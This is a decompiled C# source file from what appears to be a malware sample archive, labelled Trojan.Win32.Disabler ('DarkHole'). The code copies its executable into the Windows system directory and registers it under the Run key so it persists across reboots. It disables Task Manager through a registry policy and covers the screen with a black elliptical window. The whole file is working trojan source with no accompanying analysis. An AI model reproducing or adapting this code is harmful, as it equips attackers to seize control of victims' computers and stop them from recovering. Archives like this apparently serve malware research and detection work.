MalwareSourceCode/MSIL/Trojan/Win32/D/Trojan.Win32.Disabler.ag-8f832a067f0cbed927d9eb2ca683e9473f989c4db136e10b5039182fc621175b/ADarkHole.cs
2022-08-18 06:28:56 -05:00

95 lines
4.0 KiB
C#

// Decompiled with JetBrains decompiler
// Type: DarkHole.ADarkHole
// Assembly: DarkHole, Version=1.0.2863.37165, Culture=neutral, PublicKeyToken=null
// MVID: 004179F3-0653-4C47-86BC-65D9EC044824
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.Disabler.ag-8f832a067f0cbed927d9eb2ca683e9473f989c4db136e10b5039182fc621175b.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using System;
using System.IO;
using System.Threading;
using System.Windows.Forms;
namespace DarkHole
{
public class ADarkHole
{
public frmMain frmHole;
public ADarkHole.AElipse Elipse;
public Thread threadProgressiveDarkHole;
public ADarkHole(ref frmMain frmHl)
{
this.Elipse = new ADarkHole.AElipse();
this.threadProgressiveDarkHole = new Thread(new ThreadStart(MainModule.ProgressiveDarkHole));
this.frmHole = frmHl;
this.frmHole.Height = Screen.PrimaryScreen.WorkingArea.Height;
this.frmHole.Width = Screen.PrimaryScreen.WorkingArea.Width;
this.frmHole.Top = 0;
this.frmHole.Left = 0;
this.Elipse.Top = checked ((int) Math.Round(unchecked ((double) this.frmHole.Height / 2.0)));
this.Elipse.Left = checked ((int) Math.Round(unchecked ((double) this.frmHole.Width / 2.0)));
this.Elipse.Height = checked ((int) Math.Round(unchecked ((double) this.frmHole.Height / 2.0 + 15.0)));
this.Elipse.Width = checked ((int) Math.Round(unchecked ((double) this.frmHole.Width / 2.0 + 15.0)));
this.TaskmanagerLock(true);
this.InfectMachine();
this.DoDarkHole();
Thread progressiveDarkHole = this.threadProgressiveDarkHole;
progressiveDarkHole.IsBackground = true;
progressiveDarkHole.Priority = ThreadPriority.Normal;
progressiveDarkHole.Start();
}
public void DoDarkHole()
{
this.frmHole.Text = Strings.Space(checked ((int) Math.Round(unchecked ((double) this.frmHole.Width / 10.0 - (double) "Dark Hole".Length)))) + "Dark Hole";
this.frmHole.BackColor = System.Drawing.Color.Black;
MainModule.SetWindowRgn(this.frmHole.Handle.ToInt32(), MainModule.CreateEllipticRgn(this.Elipse.Left, this.Elipse.Top, this.Elipse.Width, this.Elipse.Height), true);
}
public void DoDarkHole(int Top, int Left, int Height, int Width)
{
this.frmHole.Text = Strings.Space(checked ((int) Math.Round(unchecked ((double) this.frmHole.Width / 10.0 - (double) "Dark Hole".Length)))) + "Dark Hole";
this.frmHole.BackColor = System.Drawing.Color.Black;
MainModule.SetWindowRgn(this.frmHole.Handle.ToInt32(), MainModule.CreateEllipticRgn(Left, Top, Width, Height), true);
}
public void InfectMachine()
{
string str = Environment.SystemDirectory + "\\DarkHole.exe";
if (!File.Exists(str))
File.Copy(Application.ExecutablePath, str);
Registry.LocalMachine.OpenSubKey("SOFTWARE").OpenSubKey("Microsoft").OpenSubKey("Windows").OpenSubKey("CurrentVersion").OpenSubKey("run", true).SetValue("DarkHole", (object) (Environment.SystemDirectory + "\\DarkHole.exe"));
}
public void TaskmanagerLock(bool Locked)
{
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("SOFTWARE").OpenSubKey("Microsoft").OpenSubKey("Windows").OpenSubKey("CurrentVersion").OpenSubKey("Policies", true);
string[] subKeyNames = registryKey.GetSubKeyNames();
int lowerBound = subKeyNames.GetLowerBound(0);
int upperBound = subKeyNames.GetUpperBound(0);
int index = lowerBound;
while (index <= upperBound)
{
if (StringType.StrCmp(subKeyNames[index], "System", false) != 0)
checked { ++index; }
else
goto label_5;
}
registryKey.CreateSubKey("System");
label_5:
registryKey.OpenSubKey("System", true).SetValue("DisableTaskMgr", (object) -(Locked ? 1 : 0));
}
public struct AElipse
{
public int Width;
public int Height;
public int Top;
public int Left;
}
}
}